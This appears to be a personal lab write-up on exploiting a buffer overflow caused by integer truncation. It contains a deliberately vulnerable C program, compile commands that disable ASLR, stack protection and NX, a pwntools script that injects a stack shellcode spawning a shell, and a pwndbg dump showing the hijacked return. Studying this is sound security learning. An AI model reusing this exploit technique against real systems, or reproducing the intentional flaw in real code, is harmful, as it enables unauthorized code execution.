Buffer overflow triggered by integer overflowβ˜•β€¦β€¦

[TOC]

Integer_Overflow

I have learned the size_t ==> unsigned char integer overflowπŸ™ƒβ€¦

Example Source Code

Instructions to compile:

echo 0 > /proc/sys/kernel/randomize_va_space
gcc -g -fno-stack-protector -z execstack size_over.c -o size_over

size_over.c

#include<stdio.h>
#include<string.h>
#include <unistd.h>
void validate_msg(char *msg,int msg_size){
    char msg_buf[11];    
    unsigned char msg_len = msg_size;
      printf("\n[+]msg_len:%d \n",msg_len);
    if(msg_len >= 4 && msg_len <= 8) {
        printf("good!\n");
        strcpy(msg_buf, msg);
    } else {
        printf("bad!\n");
    }
} 
int main() {
    size_t msg_size;
    printf("Input the size:");
    scanf("%d",&msg_size);
    unsigned char payload[1000];
    read(0,payload,msg_size);
    //printf("%s\n",payload);
    validate_msg(payload,msg_size);
}

Exploit script

Here is my exploit script…

Maybe i should spend some time to learn Underlying libc…

From this example, we can know more about the way through overflow to execute shellcode in stack and the influence of \x00……

Normally, execute shellcode in stack should make sure NX disabled…And hijacking program go to stack by using gadget jmp esp,or control Eip while knowing stack address…

#!/usr/bin/python
#coding:utf-8

from pwn import *
context(arch = 'amd64', os = 'linux')
context.log_level = "debug"

shellcode = shellcraft.sh()
shellcode = asm(shellcode)

# diffrent enviroment has diffrent address......here is test result of my computer......
rbp = 0x7fffffffdcb0
shellcode_addr = 0x7fffffffdcb0 + 0x30
# padding(12+8) + shellcode_addr(8)  
payload = ""
payload += 12 * "a"
payload += 8 * "b"
payload += p64(shellcode_addr)
payload += 0x20*"\x90"
payload += shellcode
payload  = payload.ljust(260,"\x90")
p = process('./size_over')
#gdb.attach(p)
#pause()
#p.recvuntil(":")
p.send('260\n')
p.send(payload)
p.interactive()

Running to ret2shellcode_addr:

pwndbg> ni
0x00005555555551dc in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────────────────
 RAX  0x7fffffffdca4 β—‚β€” 0x6161616161616161 ('aaaaaaaa')
 RBX  0x0
 RCX  0xffffdce062626262
 RDX  0x7fffff
 RDI  0x7fffffffdcb4 β—‚β€” 0xffffdce062626262
 RSI  0x7fffffffdcd0 β—‚β€” 0xffffdce062626262
 R8   0x7ffff7f9e500 β—‚β€” add    ch, ah /* 0x7ffff7f9e500 */
 R9   0x7fffffffdb67 β—‚β€” 0xa87c57a943ef0034 /* '4' */
 R10  0xfffffffffffff4a8
 R11  0x7ffff7f58a60 β—‚β€” add    byte ptr [rdx], cl
 R12  0x555555555090 β—‚β€” xor    ebp, ebp
 R13  0x7fffffffe190 β—‚β€” 0x1
 R14  0x0
 R15  0x0
 RBP  0x6262626262626262 ('bbbbbbbb')
 RSP  0x7fffffffdcb8 β€”β–Έ 0x7fffffffdce0 β—‚β€” 0x9090909090909090
 RIP  0x5555555551dc β—‚β€” ret    
───────────────────────────────────────────────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────────────────────────────────────────────
   0x5555555551ce    lea    rdi, qword ptr [rip + 0xe46]
   0x5555555551d5    call   0x555555555040

   0x5555555551da    nop    
   0x5555555551db    leave  
 β–Ί 0x5555555551dc    ret    <0x7fffffffdce0>

   0x5555555551dd    push   rbp
   0x5555555551de    mov    rbp, rsp
   0x5555555551e1    sub    rsp, 0x3f0
   0x5555555551e8    lea    rdi, qword ptr [rip + 0xe31]
   0x5555555551ef    mov    eax, 0
   0x5555555551f4    call   0x555555555050
────────────────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────────────
00:0000β”‚ rsp  0x7fffffffdcb8 β€”β–Έ 0x7fffffffdce0 β—‚β€” 0x9090909090909090
01:0008β”‚      0x7fffffffdcc0 β—‚β€” 0x6161616161616161 ('aaaaaaaa')
02:0010β”‚      0x7fffffffdcc8 β—‚β€” 0x6262626261616161 ('aaaabbbb')
03:0018β”‚ rsi  0x7fffffffdcd0 β—‚β€” 0xffffdce062626262
04:0020β”‚      0x7fffffffdcd8 β—‚β€” 0x9090909000007fff
05:0028β”‚      0x7fffffffdce0 β—‚β€” 0x9090909090909090
... ↓
──────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────────────
 β–Ί f 0     5555555551dc
   f 1     7fffffffdce0
   f 2 6161616161616161
   f 3 6262626261616161
   f 4 ffffdce062626262
   f 5 9090909000007fff
   f 6 9090909090909090
   f 7 9090909090909090
   f 8 9090909090909090
   f 9 b848686a90909090
   f 10 732f2f2f6e69622f
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> 

Exp Running Status: